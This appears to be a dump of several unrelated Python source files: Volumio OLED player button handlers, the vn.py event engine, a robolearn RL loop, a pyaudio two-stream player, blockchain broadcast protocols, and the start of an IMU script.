self.selectedOption = min(self.selectedOption + 1, self.totaloptions - 1)
self.MenuUpdate()
def PrevOption(self):
self.selectedOption = max(self.selectedOption - 1, 0)
self.MenuUpdate()
def SelectedOption(self):
return self.selectedOption
def DrawOn(self, image):
if self.hasLabel:
self.menuLabel.DrawOn(image, self.labelPos)
self.Icon1.DrawOn(image, self.text1Pos) #UP
self.Icon2.DrawOn(image, self.text2Pos) #Down
self.Icon3.DrawOn(image, self.text3Pos) #Discard
self.Icon4.DrawOn(image, self.text4Pos) #Accept
for row in range(self.onscreenoptions):
self.menuText[row].DrawOn(image, (42, 4 + row*16)) #Here is the position of the list entrys from left set (42)
if self.totaloptions == 0:
self.menuText[0].DrawOn(image, (42, 4)) #Here is the position of the list entrys from left set (42)
def ButtonA_PushEvent(hold_time):
global UPDATE_INTERVAL
if hold_time < 3 and oled.state != STATE_LIBRARY_INFO:
#shortpress functions below
print('ButtonA short press event')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
if oled.playState == 'play':
volumioIO.emit('pause')
else:
volumioIO.emit('play')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_PLAYLIST_MENU or oled.state == STATE_QUEUE_MENU or oled.state == STATE_LIBRARY_MENU:
oled.modal.PrevOption()
#longpress functions below
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
print('ButtonA long press event')
oled.ShutdownFlag = True
sleep(0.1)
show_logo("shutdown.ppm", oled)
sleep(5)
oled.cleanup() # put display into low power mode
volumioIO.emit('shutdown')
sleep(60)
def ButtonB_PushEvent(hold_time):
global UPDATE_INTERVAL
if hold_time < 2 and oled.state != STATE_LIBRARY_INFO:
#shortpress functions below
print('ButtonB short press event')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
volumioIO.emit('stop')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
volumioIO.emit('listPlaylist')
oled.stateTimeout = 10.0
SetState(STATE_PLAYLIST_MENU)
elif oled.state == STATE_PLAYLIST_MENU or oled.state == STATE_QUEUE_MENU or oled.state == STATE_LIBRARY_MENU:
oled.modal.NextOption()
def ButtonC_PushEvent(hold_time):
global UPDATE_INTERVAL
if hold_time < 3 and oled.state != STATE_LIBRARY_INFO:
#shortpress functions below
print('ButtonC short press event')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
volumioIO.emit('prev')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
oled.stateTimeout = 6.0
SetState(STATE_QUEUE_MENU)
#Longpress functions below
elif oled.state == STATE_PLAYER and oled.playState != 'stop':
print('ButtonC long press event')
if oled.repeatTag == False:
volumioIO.emit('setRepeat', {"value":"true"})
oled.repeatTag = True
        elif oled.repeatTag == True:
volumioIO.emit('setRepeat', {"value":"false"})
oled.repeatTag = False
def ButtonD_PushEvent(hold_time):
    global UPDATE_INTERVAL, emit_track
b_obj = BytesIO()
crl = pycurl.Curl()
if hold_time < 3:
#shortpress functions below
print('ButtonD short press event')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
volumioIO.emit('next')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
SetState(STATE_LIBRARY_INFO)
oled.playState = 'info'
crl.setopt(crl.URL, 'localhost:3000/api/v1/collectionstats')
crl.setopt(crl.WRITEDATA, b_obj)
crl.perform()
crl.close()
get_body = b_obj.getvalue()
onPushCollectionStats(get_body)
sleep(0.5)
elif oled.state == STATE_LIBRARY_INFO:
SetState(STATE_PLAYER)
onPushState(OPDsave)
elif oled.state == STATE_PLAYLIST_MENU:
LoadPlaylist(oled.playlistoptions[oled.modal.SelectedOption()])
elif oled.state == STATE_LIBRARY_MENU:
oled.stateTimeout = 10.0
EnterLibraryItem(oled.modal.SelectedOption())
elif oled.state == STATE_QUEUE_MENU:
oled.playPosition = oled.modal.SelectedOption()
emit_track = True # return to player mode
#Longpress functions below
elif oled.state == STATE_PLAYER and oled.playState != 'stop':
print('ButtonD long press event')
if oled.randomTag == False:
volumioIO.emit('setRandom', {"value":"true"})
oled.randomTag = True
elif oled.randomTag == True:
volumioIO.emit('setRandom', {"value":"false"})
oled.randomTag = False
def RightKnob_RotaryEvent(dir):
global emit_track
if oled.state == STATE_PLAYLIST_MENU or oled.state == STATE_LIBRARY_MENU:
oled.stateTimeout = 10.0
if dir == RotaryEncoder.LEFT:
oled.modal.PrevOption()
elif dir == RotaryEncoder.RIGHT:
oled.modal.NextOption()
elif oled.state == STATE_QUEUE_MENU:
oled.stateTimeout = 6.0
if dir == RotaryEncoder.LEFT:
oled.modal.PrevOption()
elif dir == RotaryEncoder.RIGHT:
oled.modal.NextOption()
oled.playPosition = oled.modal.SelectedOption()
emit_track = True
elif oled.state == STATE_PLAYER and oled.playState != 'stop':
oled.stateTimeout = 10.0
SetState(STATE_QUEUE_MENU)
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_LIBRARY_INFO:
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
def RightKnob_PushEvent(hold_time):
    global emit_track
    if hold_time < 1:
#shortpress fuctions below
print ('RightKnob_PushEvent SHORT')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
if oled.playState == 'play':
volumioIO.emit('pause')
else:
volumioIO.emit('play')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_LIBRARY_INFO:
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_PLAYLIST_MENU:
LoadPlaylist(oled.playlistoptions[oled.modal.SelectedOption()])
elif oled.state == STATE_LIBRARY_MENU:
oled.stateTimeout = 10.0
EnterLibraryItem(oled.modal.SelectedOption())
elif oled.state == STATE_QUEUE_MENU:
oled.playPosition = oled.modal.SelectedOption()
emit_track = True # return to player mode
#longpress functions below
else:
print ('RightKnob_PushEvent')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_LIBRARY_INFO:
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
#Down below is the definition of the physical buttons.
#Sample: RightKnob_Push = PushButton(27, max_time=1) -> GPIO 27 is used
#Which button is connected to which GPIO? (according to the wiring diagram Maschine2501/Volumio-OledUI)
# Button A: GPIO 4
# Button B: GPIO 17
# Button C: GPIO 5
# Button D: GPIO 6
# Button right-Rotary: GPIO 27
ButtonA_Push = PushButton(4, max_time=3)
ButtonA_Push.setCallback(ButtonA_PushEvent)
ButtonB_Push = PushButton(17, max_time=1)
ButtonB_Push.setCallback(ButtonB_PushEvent)
ButtonC_Push = PushButton(5, max_time=3)
ButtonC_Push.setCallback(ButtonC_PushEvent)
ButtonD_Push = PushButton(6, max_time=3)
ButtonD_Push.setCallback(ButtonD_PushEvent)
RightKnob_Push = PushButton(27, max_time=1)
RightKnob_Push.setCallback(RightKnob_PushEvent)
RightKnob_Rotation = RotaryEncoder(22, 23, pulses_per_cycle=4)
RightKnob_Rotation.setCallback(RightKnob_RotaryEvent)
#IR receiver is connected to port 13
show_logo("volumio_logo.ppm", oled)
sleep(2)
SetState(STATE_PLAYER)
updateThread = Thread(target=display_update_service)
updateThread.daemon = True
updateThread.start()
def _receive_thread():
volumioIO.wait()
receive_thread = Thread(target=_receive_thread)
receive_thread.daemon = True
receive_thread.start()
volumioIO.on('pushState', onPushState)
#volumioIO.on('pushcollectionstats', onPushCollectionStats)
volumioIO.on('pushListPlaylist', onPushListPlaylist)
volumioIO.on('pushQueue', onPushQueue)
volumioIO.on('pushBrowseSources', onPushBrowseSources)
volumioIO.on('pushBrowseLibrary', onLibraryBrowse)
# get list of Playlists and initial state
volumioIO.emit('listPlaylist')
volumioIO.emit('getState')
volumioIO.emit('getQueue')
#volumioIO.emit('collectionstats')
#volumioIO.emit('getBrowseSources')
sleep(0.1)
#def timeupdate()
# start_time = datetime.datetime.now()
try:
with open('oledconfig.json', 'r') as f: #load last playing track number
config = json.load(f)
except IOError:
pass
else:
oled.playPosition = config['track']
if oled.playState != 'play':
volumioIO.emit('play', {'value':oled.playPosition})
varcanc = True #helper for pause -> stop timeout counter
InfoTag = 0 #helper for missing Artist/Song when changing sources
while True:
if emit_volume:
emit_volume = False
print("volume: " + str(oled.volume))
volumioIO.emit('volume', oled.volume)
if emit_track and oled.stateTimeout < 4.5:
emit_track = False
try:
print('Track selected: ' + str(oled.playPosition+1) + '/' + str(len(oled.queue)) + ' ' + oled.queue[oled.playPosition].encode('ascii', 'ignore'))
except IndexError:
pass
volumioIO.emit('play', {'value':oled.playPosition})
sleep(0.1)
    #this is the loop to refresh artist/song when changing sources (runs a few times after a source change)
if oled.state == STATE_PLAYER and InfoTag <= 3 and newStatus != 'stop':
oled.modal.UpdatePlayingInfo(oled.activeArtist, oled.activeSong, oled.activeFormat, oled.activeSamplerate, oled.activeBitdepth, oled.playIcon, oled.pauseIcon, oled.stopIcon, oled.prevIcon, oled.nextIcon)
InfoTag += 1
sleep(1.5)
#this is the loop to push the actual time every 0.1sec to the "Standby-Screen"
if oled.state == STATE_PLAYER and newStatus == 'stop' and oled.ShutdownFlag == False:
InfoTag = 0 #resets the InfoTag helper from artist/song update loop
oled.time = strftime("%H:%M:%S")
oled.modal.UpdateStandbyInfo(oled.time, oled.IP, oled.date, oled.libraryIcon, oled.playlistIcon, oled.queueIcon, oled.libraryInfo)
#if playback is paused, here is defined when the Player goes back to "Standby"/Stop
if oled.state == STATE_PLAYER and newStatus == 'pause' and varcanc == True:
secvar = int(round(time()))
varcanc = False
elif oled.state == STATE_PLAYER and newStatus == 'pause' and int(round(time())) - secvar > 15:
varcanc = True
volumioIO.emit('stop')
sleep(0.1)
|
engine.py
|
"""
Event-driven framework of the vn.py project.
"""
import sys
from collections import defaultdict
from queue import Empty, Queue
from threading import Thread
from time import sleep, time
from typing import Any, Callable
EVENT_TIMER = "eTimer"
class Event:
"""
Event object consists of a type string which is used
by event engine for distributing event, and a data
object which contains the real data.
"""
def __init__(self, type: str, data: Any = None):
""""""
self.type = type
self.data = data
# Defines handler function to be used in event engine.
HandlerType = Callable[[Event], None]
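# Illustrative example (not part of the original module): any callable matching
# this signature can be registered, e.g.
#   def print_event(event: Event) -> None:
#       print(event.type, event.data)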
class EventEngine:
"""
Event engine distributes event object based on its type
to those handlers registered.
It also generates timer event by every interval seconds,
which can be used for timing purpose.
"""
def __init__(self, interval: int = 1, debug: bool = False, over_ms: int = 500):
"""
Timer event is generated every 1 second by default, if
interval not specified.
        Enhanced mode:
        debug: enable per-handler performance debugging.
        over_ms: threshold in milliseconds; handlers that take longer are reported.
        Handler execution is also wrapped in try/except so exceptions are caught and logged.
"""
self._interval = interval
self._queue = Queue()
self._active = False
self._debug = debug
self._over_ms = over_ms
self._thread = Thread(target=self._run)
self._timer = Thread(target=self._run_timer)
self._handlers = defaultdict(list)
self._general_handlers = []
def _run(self):
"""
Get event from queue and then process it.
"""
while self._active:
try:
event = self._queue.get(block=True, timeout=1)
                if self._debug:
                    self._process_debug(event)
                else:
                    self._process(event)
except Empty:
pass
def _process_debug(self, event: Event):
"""
        Process an event in debug mode:
        1. measure each handler's execution time
        2. catch and report handler exceptions
"""
for handler in self._handlers[event.type]:
t1 = time()
handler_name = str(handler.__qualname__)
try:
handler(event)
except Exception as ex:
                print(f'Error running {event.type} {handler_name}: {str(ex)}',
                      file=sys.stderr)
continue
t2 = time()
execute_ms = (int(round(t2 * 1000))) - (int(round(t1 * 1000)))
if execute_ms > self._over_ms:
                print(f'Running {event.type} {handler_name} took {execute_ms}ms > {self._over_ms}ms',
                      file=sys.stderr)
if self._general_handlers:
for handler in self._general_handlers:
t1 = time()
handler_name = str(handler.__qualname__)
handler(event)
t2 = time()
execute_ms = (int(round(t2 * 1000))) - (int(round(t1 * 1000)))
if execute_ms > self._over_ms:
                    print(f'Running general {event.type} {handler_name} took {execute_ms}ms > {self._over_ms}ms',
                          file=sys.stderr)
def _process(self, event: Event):
"""
        First distribute the event to those handlers registered to listen
        to this specific type.
        Then distribute the event to the general handlers which listen
        to all types.
"""
if event.type in self._handlers:
[handler(event) for handler in self._handlers[event.type]]
if self._general_handlers:
[handler(event) for handler in self._general_handlers]
def _run_timer(self):
"""
Sleep by interval second(s) and then generate a timer event.
"""
while self._active:
sleep(self._interval)
event = Event(EVENT_TIMER)
self.put(event)
def start(self):
"""
Start event engine to process events and generate timer events.
"""
self._active = True
self._thread.start()
self._timer.start()
def stop(self):
"""
Stop event engine.
"""
self._active = False
self._timer.join()
self._thread.join()
def put(self, event: Event):
"""
Put an event object into event queue.
"""
self._queue.put(event)
def register(self, type: str, handler: HandlerType):
"""
Register a new handler function for a specific event type. Every
function can only be registered once for each event type.
"""
handler_list = self._handlers[type]
if handler not in handler_list:
handler_list.append(handler)
def unregister(self, type: str, handler: HandlerType):
"""
Unregister an existing handler function from event engine.
"""
handler_list = self._handlers[type]
if handler in handler_list:
handler_list.remove(handler)
if not handler_list:
self._handlers.pop(type)
def register_general(self, handler: HandlerType):
"""
Register a new handler function for all event types. Every
function can only be registered once for each event type.
"""
if handler not in self._general_handlers:
self._general_handlers.append(handler)
def unregister_general(self, handler: HandlerType):
"""
Unregister an existing general handler function.
"""
if handler in self._general_handlers:
self._general_handlers.remove(handler)
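if __name__ == "__main__":
    # Illustrative usage sketch (not part of the original module): register a
    # handler for the built-in timer event, run for a few seconds, then stop.
    def on_timer(event: Event) -> None:
        print("timer fired:", event.type)
    engine = EventEngine(interval=1)
    engine.register(EVENT_TIMER, on_timer)
    engine.start()
    engine.put(Event("eCustom", {"payload": 42}))  # arbitrary event types can be queued too
    sleep(3)
    engine.stop()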
|
algo_with_multi.py
|
import sys
import os
import time
import threading
import numpy as np
from robolearn.old_utils.algo_interface import AlgoInterface
from robolearn.old_envs.manipulator2d.manipulator2d_env import Manipulator2dEnv
from robolearn.old_utils.ros_utils import get_available_port
init_roscore_port = 11312
init_gzserver_port = 11347
class SimpleRLAlgo(object):
def __init__(self, N, T, ts):
interface_fcns = [(self.stop, 'stop'), (self.start, 'start'), (self.restart, 'restart'),
(self.is_running_fcn, 'is_running'), (self.kill_me, 'kill')]
self.algo_interface = AlgoInterface(interface_fcns)
self.n_iterations = N
self.T = T
self.Ts = ts
self.is_running = False
self.is_training = False
self.is_finished = False
self.total_gz_ros = 2
self.rosgazebos = [None for _ in range(self.total_gz_ros)]
self.roscore_ports = [None for _ in range(self.total_gz_ros)]
self.gzserver_ports = [None for _ in range(self.total_gz_ros)]
for ii in range(self.total_gz_ros):
if ii == 0:
last_roscore_port = init_roscore_port
last_gzserver_port = init_gzserver_port
else:
last_roscore_port = self.roscore_ports[ii-1] + 1
last_gzserver_port = self.gzserver_ports[ii-1] + 1
self.roscore_ports[ii] = get_available_port('localhost', last_roscore_port)
self.gzserver_ports[ii] = get_available_port('localhost', last_gzserver_port)
self.rosgazebos[ii] = Manipulator2dEnv('localhost', roscore_port=self.roscore_ports[ii],
gzserver_port=self.gzserver_ports[ii])
self.rosgazebos[ii].start()
self.running_thread = threading.Thread(target=self.running, args=[])
        self.running_thread.daemon = True
self.running_thread.start()
def start(self):
print("This is starting")
self.is_running = True
return True
def running(self):
while not self.is_finished:
if self.is_running:
self.is_training = True
for nn in range(self.n_iterations):
if self.is_running is False:
break
# Interaction
for ii in range(self.total_gz_ros):
self.rosgazebos[ii].reset(time=None, freq=None, cond=0)
for t in range(self.T):
if self.is_running is False:
break
for ii in range(self.total_gz_ros):
# get obs/state
print("State env[%d]: %s" % (ii, self.rosgazebos[ii].get_observation()))
# act
self.rosgazebos[ii].send_action(np.random.randn(3))
print("Iteration %d/%d, time=%d/%d" % (nn+1, self.n_iterations, t+1, self.T))
time.sleep(self.Ts)
# Evaluation
# Update
self.is_training = False
def restart(self):
print("This is restarting")
self.stop()
        while self.is_training:
            time.sleep(0.01)  # yield instead of busy-waiting while the training loop winds down
self.start()
return True
def stop(self):
print("This is stopping")
self.is_running = False
return True
def is_running_fcn(self):
print("Is this running?: %s " % self.is_running)
return self.is_running
def kill_me(self):
print("This is killing itself!!")
self.finish()
for ii in range(self.total_gz_ros):
self.rosgazebos[ii].stop()
self.stop()
del self
return True
def finish(self):
self.is_finished = True
if __name__ == "__main__":
try:
simple_algo = SimpleRLAlgo(20, 100, 0.2)
simple_algo.start()
        while not simple_algo.is_finished:
            time.sleep(0.5)  # yield instead of busy-waiting for the algorithm to finish
except KeyboardInterrupt:
print('Interrupted')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
print("This algorithm has been finished!!")
|
MultiplesStreams.py
|
import pyaudio
import wave
import time
import threading
wf = wave.open("audio/bird.wav", 'rb')
wf2 = wave.open("audio/cat.wav", 'rb')
#init obj
p = pyaudio.PyAudio()
p2 = pyaudio.PyAudio()
# define callback (2)
def callback1(in_data, frame_count, time_info, status):
data = wf.readframes(frame_count)
return (data, pyaudio.paContinue)
def callback2(in_data, frame_count, time_info, status):
data2 = wf2.readframes(frame_count)
return (data2, pyaudio.paContinue)
def worker(streams, wfs):
streams.start_stream()
while streams.is_active():
time.sleep(0.1)
streams.stop_stream()
streams.close()
wfs.close()
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True,
stream_callback=callback1)
stream2 = p2.open(format=p2.get_format_from_width(wf2.getsampwidth()),
channels=wf2.getnchannels(),
rate=wf2.getframerate(),
output=True,
stream_callback=callback2)
t = threading.Thread(target=worker, args=(stream, wf,), name='primero')
w = threading.Thread(target=worker, args=(stream2, wf2,), name='segundo')
w.start()
t.start()
# Wait until both playback threads have finished, then release the PyAudio instances.
while w.is_alive() or t.is_alive():
    time.sleep(0.1)
p.terminate()
p2.terminate()
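# Illustrative alternative (not part of the original script): a single PyAudio
# instance can serve several callback streams, so the second instance above is not
# strictly required. File names and variable names here are placeholders.
#
#     pa = pyaudio.PyAudio()
#     wavs = [wave.open(name, 'rb') for name in ("audio/bird.wav", "audio/cat.wav")]
#
#     def make_callback(wav):
#         def callback(in_data, frame_count, time_info, status):
#             return (wav.readframes(frame_count), pyaudio.paContinue)
#         return callback
#
#     streams = [pa.open(format=pa.get_format_from_width(wav.getsampwidth()),
#                        channels=wav.getnchannels(),
#                        rate=wav.getframerate(),
#                        output=True,
#                        stream_callback=make_callback(wav))
#                for wav in wavs]
#     while any(s.is_active() for s in streams):
#         time.sleep(0.1)
#     for s, wav in zip(streams, wavs):
#         s.close()
#         wav.close()
#     pa.terminate()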
|
protocols.py
|
import multiprocessing
import logging.config
import threading
import hashlib
import logging
import queue
import uuid
import time
import sys
import os
import module
logging.config.fileConfig(os.path.join(os.path.dirname(__file__), "logging.conf"))
logger = logging.getLogger("tamperproofbroadcast")
class FOTB(module.Module):
def _createTransaction(self, privkey, pubkeyhash, prevtxhash, message):
logger.debug(
"creating transaction: %s", (privkey, pubkeyhash, prevtxhash, message)
)
payload = self._pack(message)
inputs = [{"txid": prevtxhash, "vout": 0, "sequence": 0}]
outputs = {pubkeyhash: 0}
data = [payload]
transaction = self.southbound.createrawtransaction(inputs, outputs, data)
signedtransaction = self.southbound.signrawtransaction(
transaction, [], [privkey]
)["hex"]
return signedtransaction
def _unpackTransaction(self, txhex):
try:
logger.debug("unpacking transaction: %s", txhex)
transaction = self.southbound.decoderawtransaction(txhex)
payload = transaction["vout"][1]["data"][0]
message = self._unpack(payload)
pubkeyhash = self.southbound.decoderawtransaction(
self.southbound.getrawtransaction(transaction["vin"][0]["txid"])
)["vout"][0]["scriptPubKey"]["addresses"][0]
txhash = transaction["txid"]
return pubkeyhash, txhash, message
except Exception as e:
logger.debug("error unpacking: %s", e)
def _sendTransaction(self, signedtransaction):
logger.debug("sending transaction: %s", signedtransaction)
txhash = self.southbound.sendrawtransaction(signedtransaction)
return txhash
def _start(self):
self.southbound._start()
if self.prevtxhash is None and self.privkey is None and self.pubkeyhash is None:
(
self.privkey,
self.pubkeyhash,
self.prevtxhash,
transaction,
) = self.southbound._create_funded_keypair()
self.lock.acquire()
self.waiting[self.prevtxhash] = transaction
self.lock.release()
logger.info(
"starting blockchain broadcast: privkey=%s pubkey=%s prevtxhash=%s"
% (self.privkey, self.pubkeyhash, self.prevtxhash)
)
threading.Thread(target=self._timeout_append, daemon=True).start()
threading.Thread(target=self._timeout_deliver, daemon=True).start()
threading.Thread(target=self._timeout_broadcast, daemon=True).start()
def _stop(self):
self.stop_event.set()
time.sleep(1)
self.southbound._stop()
def __init__(
self,
privkey=None,
pubkeyhash=None,
prevtxhash=None,
queuesize=2 ** 7,
startheight=0,
):
self.southbound = None
self.filesystem = None
self.waiting = {}
self.delivered = {}
self.lock = threading.Lock()
self.ledger = []
self.privkey = privkey
self.pubkeyhash = pubkeyhash
self.pid = pubkeyhash
self.prevtxhash = prevtxhash
self.queue = queue.Queue(maxsize=queuesize)
self.deliverqueue = queue.Queue(maxsize=queuesize)
self.startheight = int(startheight)
self.stop_event = threading.Event()
def broadcast(self, message):
logger.debug("broadcast: %s", message)
self.queue.put(message)
def _timeout_broadcast(self):
while not self.stop_event.is_set():
t = time.time()
size = 0
messages = []
while True:
try:
message = self.queue.get_nowait()
messages.append(message)
size += sys.getsizeof(message)
                except queue.Empty:
                    pass
if t + 0.1 < time.time() or size > 2 ** 11:
break
            if messages:
signedtransaction = self._createTransaction(
self.privkey, self.pubkeyhash, self.prevtxhash, messages
)
self.prevtxhash = self._sendTransaction(signedtransaction)
self.lock.acquire()
self.waiting[self.prevtxhash] = signedtransaction
self.lock.release()
time.sleep(0.1)
def _timeout_append(self):
while not self.stop_event.is_set():
logger.debug("upon timeout (append)")
self.lock.acquire()
for txhash, signedtransaction in self.waiting.items():
logger.debug("trigger append: %s", txhash)
self._sendTransaction(signedtransaction)
self.lock.release()
time.sleep(600.0)
def _timeout_deliver(self):
while not self.stop_event.is_set():
try:
logger.debug("upon timeout (deliver)")
logger.debug("trigger get")
bbh = self.southbound.getbestblockhash()
newledger = []
if len(self.ledger) == 0:
if self.startheight == 0:
self.ledger = [None]
else:
self.ledger = [
self.southbound.getblock(self.startheight - 1, 1).get(
"previousblockhash", None
)
]
while bbh not in self.ledger:
newledger.append(bbh)
bbh = self.southbound.getblock(bbh, 1).get(
"previousblockhash", None
)
newledger.reverse()
self.oldledger = self.ledger[self.ledger.index(bbh) + 1 :]
self.ledger = self.ledger[: self.ledger.index(bbh) + 1]
self.ledger.extend(newledger)
for block in self.oldledger:
for transaction in self.southbound.getblock(block, 2)["tx"]:
try:
utx = self._unpackTransaction(transaction["hex"])
                            if utx is None:
continue
pid, txid, messages = utx
if txid in self.delivered:
self.lock.acquire()
if txid in self.waiting:
self.waiting[txid] = transaction["hex"]
self.lock.release()
except Exception as e:
logger.error("error: %s", e)
logger.debug("upon getreturn: newledger=...%s" % newledger[-6:])
for block in newledger:
for transaction in self.southbound.getblock(block, 2)["tx"]:
try:
utx = self._unpackTransaction(transaction["hex"])
                            if utx is None:
continue
pid, txid, messages = utx
if txid in self.delivered:
continue
self.delivered[txid] = transaction["hex"]
for message in messages:
logger.debug(
"trigger deliver: pid=%s; txid=%s; message=%s"
% (pid, txid, message)
)
self.deliverqueue.put((pid, txid, message))
self.lock.acquire()
if txid in self.waiting:
self.waiting.pop(txid)
self.lock.release()
except Exception as e:
logger.error("error: %s", e)
time.sleep(1.0)
except Exception as e:
logger.error("error: %s", e)
raise
def deliver(self, blocking=False):
        if not blocking:
            try:
                return self.deliverqueue.get_nowait()
            except queue.Empty:
                raise Exception({"error": "nothing to deliver"})
else:
return self.deliverqueue.get()
def _create(self):
self.southbound._create()
def _uncreate(self):
self.southbound._uncreate()
class TOTB(module.Module):
def _createTransaction(self, privkey, pubkeyhash, prevtxhash, message):
logger.debug(
"creating transaction: %s", (privkey, pubkeyhash, prevtxhash, message)
)
payload = self._pack(message)
inputs = [{"txid": prevtxhash, "vout": 0, "sequence": 0}]
outputs = {pubkeyhash: 0}
data = [payload]
transaction = self.southbound.createrawtransaction(inputs, outputs, data)
signedtransaction = self.southbound.signrawtransaction(
transaction, [], [privkey]
)["hex"]
return signedtransaction
def _unpackTransaction(self, txhex):
try:
logger.debug("unpacking transaction: %s", txhex)
transaction = self.southbound.decoderawtransaction(txhex)
payload = transaction["vout"][1]["data"][0]
message = self._unpack(payload)
pubkeyhash = self.southbound.decoderawtransaction(
self.southbound.getrawtransaction(transaction["vin"][0]["txid"])
)["vout"][0]["scriptPubKey"]["addresses"][0]
txhash = transaction["txid"]
return pubkeyhash, txhash, message
except Exception as e:
logger.debug("error unpacking: %s", e)
def _sendTransaction(self, signedtransaction):
logger.debug("sending transaction: %s", signedtransaction)
txhash = self.southbound.sendrawtransaction(signedtransaction)
return txhash
def _start(self):
self.southbound._start()
if self.prevtxhash is None and self.privkey is None and self.pubkeyhash is None:
(
self.privkey,
self.pubkeyhash,
self.prevtxhash,
transaction,
) = self.southbound._create_funded_keypair()
self.lock.acquire()
self.waiting[self.prevtxhash] = transaction
self.lock.release()
logger.info(
"starting blockchain broadcast: privkey=%s pubkey=%s prevtxhash=%s"
% (self.privkey, self.pubkeyhash, self.prevtxhash)
)
threading.Thread(target=self._timeout_append, daemon=True).start()
threading.Thread(target=self._timeout_deliver, daemon=True).start()
threading.Thread(target=self._timeout_broadcast, daemon=True).start()
def _stop(self):
self.stop_event.set()
time.sleep(1)
self.southbound._stop()
def __init__(
self,
privkey=None,
pubkeyhash=None,
prevtxhash=None,
queuesize=2 ** 7,
startheight=0,
):
self.southbound = None
self.filesystem = None
self.waiting = {}
self.lock = threading.Lock()
self.ledger = []
self.confirmed_height = 1
self.privkey = privkey
self.pubkeyhash = pubkeyhash
self.pid = pubkeyhash
self.prevtxhash = prevtxhash
self.queue = queue.Queue(maxsize=queuesize)
self.deliverqueue = queue.Queue(maxsize=queuesize)
self.startheight = int(startheight)
self.stop_event = threading.Event()
def broadcast(self, message):
logger.debug("broadcast: %s", message)
self.queue.put(message)
def _timeout_broadcast(self):
while not self.stop_event.is_set():
t = time.time()
size = 0
messages = []
while True:
try:
message = self.queue.get_nowait()
messages.append(message)
size += sys.getsizeof(message)
                except queue.Empty:
                    pass
if t + 0.1 < time.time() or size > 2 ** 11:
break
            if messages:
signedtransaction = self._createTransaction(
self.privkey, self.pubkeyhash, self.prevtxhash, messages
)
self.prevtxhash = self._sendTransaction(signedtransaction)
self.lock.acquire()
self.waiting[self.prevtxhash] = signedtransaction
self.lock.release()
time.sleep(0.1)
def _timeout_append(self):
while not self.stop_event.is_set():
logger.debug("upon timeout (append)")
self.lock.acquire()
for txhash, signedtransaction in self.waiting.items():
logger.debug("trigger append: %s", txhash)
self._sendTransaction(signedtransaction)
self.lock.release()
time.sleep(600.0)
def _timeout_deliver(self):
while not self.stop_event.is_set():
try:
logger.debug("upon timeout (deliver)")
logger.debug("trigger get")
bbh = self.southbound.getbestblockhash()
newledger = []
if len(self.ledger) == 0:
if self.startheight == 0:
self.ledger = [None]
else:
self.ledger = [
self.southbound.getblock(self.startheight - 1, 1).get(
"previousblockhash", None
)
]
while bbh not in self.ledger:
newledger.append(bbh)
bbh = self.southbound.getblock(bbh, 1).get(
"previousblockhash", None
)
newledger.reverse()
self.ledger = self.ledger[: self.ledger.index(bbh) + 1]
self.ledger.extend(newledger)
logger.debug("upon getreturn: ledger=...%s" % self.ledger[-6:])
for block in self.ledger[self.confirmed_height : -6]:
self.confirmed_height += 1
for transaction in self.southbound.getblock(block, 2)["tx"]:
try:
utx = self._unpackTransaction(transaction["hex"])
                            if utx is None:
continue
pid, txid, messages = utx
for message in messages:
logger.debug(
"trigger deliver: pid=%s; txid=%s; message=%s"
% (pid, txid, message)
)
self.deliverqueue.put((pid, txid, message))
self.lock.acquire()
if txid in self.waiting:
self.waiting.pop(txid)
self.lock.release()
except Exception as e:
logger.error("error: %s", e)
time.sleep(5.0)
except Exception as e:
logger.error("error: %s", e)
raise
def deliver(self, blocking=False):
        if not blocking:
            try:
                return self.deliverqueue.get_nowait()
            except queue.Empty:
                raise Exception({"error": "nothing to deliver"})
else:
return self.deliverqueue.get()
def _create(self):
self.southbound._create()
def _uncreate(self):
self.southbound._uncreate()
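# Illustrative sketch (not part of the original module): how a broadcast instance is
# typically driven once the surrounding framework has attached a `southbound`
# blockchain client. The client object and its wiring are assumptions here.
#
#     totb = TOTB(startheight=0)
#     totb.southbound = southbound_client          # hypothetical blockchain RPC wrapper
#     totb._start()                                # spawns the append/deliver/broadcast threads
#     totb.broadcast({"op": "hello"})              # queued, batched, then written on-chain
#     while True:
#         try:
#             pid, txid, message = totb.deliver()  # non-blocking; raises when queue is empty
#             print(pid, txid, message)
#         except Exception:
#             time.sleep(1.0)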
|
IMU_script.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 8 10:42:15 2019
@author: mitchell & stefan
"""
from IMU_module import IMU
import queue
import threading
import time
import sys
import signal
# def run(name,q):
# while True:
# header, data = imu.get_IMU_data()
# timestamp = header[1]
# #data2 = imu2.get_IMU_data()
# """
# DO STUFF
# """
# print("imu data: ", data)
# #print("%f,%d,% 9f,% 9f,% 9f,% 9f,% 9f,% 9f,% 9f" % tuple(data1) )
# #print("% 9f,% 9f,% 9f,% 9f,% 9f,% 9f,% 9f" % tuple(data) )
# q.put((header, data))
# #time.sleep()
def signal_handler(sig, frame):
print("Keyboard Interrupt")
for imu in IMUs:
imu.stop_streaming()
quit()
#send_command_bytes_usb(chr(0x56))
IMUs = []
